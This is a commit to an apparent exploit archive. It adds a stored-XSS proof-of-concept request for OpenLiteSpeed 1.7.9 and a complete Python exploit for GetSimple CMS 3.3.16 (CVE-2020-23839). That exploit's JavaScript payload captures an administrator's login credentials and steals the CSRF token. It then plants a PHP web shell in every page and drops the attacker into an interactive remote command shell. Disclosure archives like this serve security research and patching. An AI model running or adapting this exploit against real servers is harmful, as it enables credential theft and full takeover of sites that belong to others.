DB: 2021-03-31

2 changes to exploits/shellcodes GetSimple CMS 3.3.16 - Reflected XSS to RCE Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
2021-03-31 05:01:55 +00:00 · 2021-03-31 05:01:55 +00:00 · 4c9eccdc6d
commit 4c9eccdc6d
parent e6cd1b38eb
3 changed files with 166 additions and 0 deletions
--- a/exploits/multiple/webapps/49727.txt
+++ b/exploits/multiple/webapps/49727.txt
@ -0,0 +1,39 @@
+# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
+# Date: 3/30/2021
+# Exploit Author: cmOs
+# Vendor Homepage: https://openlitespeed.org/
+# Software Link: https://openlitespeed.org/kb/install-from-binary/
+# Version: 1.7.9
+# Tested on Ubuntu 20.04
+
+Step 1: Log in to the dashboard using the Administrator account
+Step 2: Go to Listeners > Summary > Actions (View) > Edit
+Step 3: Inject XSS_Payload to "Notes" parameter
+Step 4: Graceful Restart
+Step 5: Trigger XSS when Administrator click on Default Icon
+
+[POC]
+
+POST /view/confMgr.php HTTP/1.1
+Host: 127.0.0.1:7080
+Connection: close
+Content-Length: 163
+sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
+Accept: text/html, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
+Gecko) Chrome/89.0.4389.90 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://127.0.0.1:7080
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://127.0.0.1:7080/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;
+litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;
+LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D
+
+name=Default&ip=ANY&port=8088&reusePort=&secure=0&note=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257
--- a/exploits/php/webapps/49726.py
+++ b/exploits/php/webapps/49726.py
@ -0,0 +1,125 @@
+# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE
+# Exploit Author: Bobby Cooke (boku)
+# Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
+# Date: March 29th, 2021
+# CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839
+# Vendor Homepage: http://get-simple.info
+# Software Link: http://get-simple.info/download/
+# Version: v3.3.16
+# Tested against Server Host: Windows 10 Pro + XAMPP
+# Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge
+# Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839
+
+#  Vulnerability Description:
+#  GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 #  via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket.
+#  Exploit Description:
+#  This exploit creates a Reflected XSS payload, in the form of a hyperlink,  which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation #  attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.
+#  Attack Chain:
+#  1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit
+#  2. Admin then enters their credentials into the GetSimple CMS login portal
+#  3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter
+#  4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel
+#  5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS
+#  6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS
+#  7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned
+#  8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console
+
+import sys,re,argparse,requests
+from urllib.parse import quote
+from colorama import (Fore as F, Back as B, Style as S)
+from time import sleep
+
+FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
+def bullet(char,color):
+    C=FB if color == 'B' else FR if color == 'R' else FG 
+    return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' '
+info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G')
+
+def webshell(SERVER_URL):
+    try:
+        WEB_SHELL = SERVER_URL
+        getdir  = {'FierceGodKick': 'echo %CD%'}
+        r = requests.post(url=WEB_SHELL, data=getdir, verify=False)
+        status = r.status_code
+        cwd = re.findall(r'[CDEF].*', r.text)
+        if cwd:
+            cwd = cwd[0]+"> "
+            term = SB+FG+cwd+FT
+            print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+'     WELCOME BOKU     '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST)
+            while True:
+                thought = input(term)
+                command = {'FierceGodKick': thought}
+                r = requests.post(WEB_SHELL, data=command, verify=False)
+                status = r.status_code
+                if status != 200:
+                    r.raise_for_status()
+                response = r.text
+                print(response)
+        else:
+            r.raise_for_status()
+    except:
+        pass
+
+def urlEncode(javascript):
+    return quote(javascript)
+
+def genXssPayload():
+    XSS_PAYLOAD = '/index/javascript:'
+    XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");'
+    XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";'
+    XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};'
+    XSS_PAYLOAD += 'var user = document.forms[0][0].value;'
+    XSS_PAYLOAD += 'var pass = document.forms[0][1].value;'
+    XSS_PAYLOAD += 'var u1 = s+"admin"+s;'
+    XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";'
+    XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();'
+    XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();'
+    XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();'
+    XSS_PAYLOAD += 'xhr1.open("POST",u1,true);'
+    XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);'
+    XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";'
+    XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){'
+    XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {'
+    XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){'
+    XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {'
+    XSS_PAYLOAD += 'r=this.responseXML;'
+    XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;'
+    XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;'
+    XSS_PAYLOAD += 'xhr3.open("POST",u2,true);'
+    XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);'
+    XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");'
+    XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
+    XSS_PAYLOAD += 'xhr3.send(params);'
+    XSS_PAYLOAD += '}};'
+    XSS_PAYLOAD += 'xhr2.open("GET",u2,true);'
+    XSS_PAYLOAD += 'xhr2.responseType="document";'
+    XSS_PAYLOAD += 'xhr2.send();'
+    XSS_PAYLOAD += '}};'
+    XSS_PAYLOAD += 'xhr1.send(params);'
+    XSS_PAYLOAD += '%2f%2f'
+    return XSS_PAYLOAD
+
+def argsetup():
+    about  = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink,  which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST
+    parser = argparse.ArgumentParser(description=about)
+    parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
+    args = parser.parse_args()
+    return args
+
+if __name__ == "__main__":
+    print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB)
+    print(SB+FR+'         CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT)
+    print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST)
+    args = argsetup()
+    RHOST = args.TargetSite
+    WEBAPP_URL = RHOST+'/admin/'
+    WEBAPP_URL = WEBAPP_URL+'index.php'
+    PAYLOAD = genXssPayload()
+    ENCODED_PAYLOAD = urlEncode(PAYLOAD)
+    print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST)
+    print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST)
+    sleep(1)
+    print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..')
+    while True:
+        sleep(1)
+        webshell(RHOST)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -43639,6 +43639,7 @@ id,file,description,date,author,type,platform,port
 49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
 49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,
 49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",2020-12-22,Mosaaed,webapps,php,
+49726,exploits/php/webapps/49726.py,"GetSimple CMS 3.3.16 - Reflected XSS to RCE",2021-03-30,boku,webapps,php,
 49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php,
 49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php,
 49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
@ -43905,3 +43906,4 @@ id,file,description,date,author,type,platform,port
 49723,exploits/php/webapps/49723.txt,"Budget Management System 1.0 - 'Budget title' Stored XSS",2021-03-29,"Jitendra Kumar Tripathi",webapps,php,
 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,
 49725,exploits/windows/webapps/49725.py,"SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow",2021-03-29,"Filipe Oliveira",webapps,windows,
+49727,exploits/multiple/webapps/49727.txt,"Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting",2021-03-30,cmOs,webapps,multiple,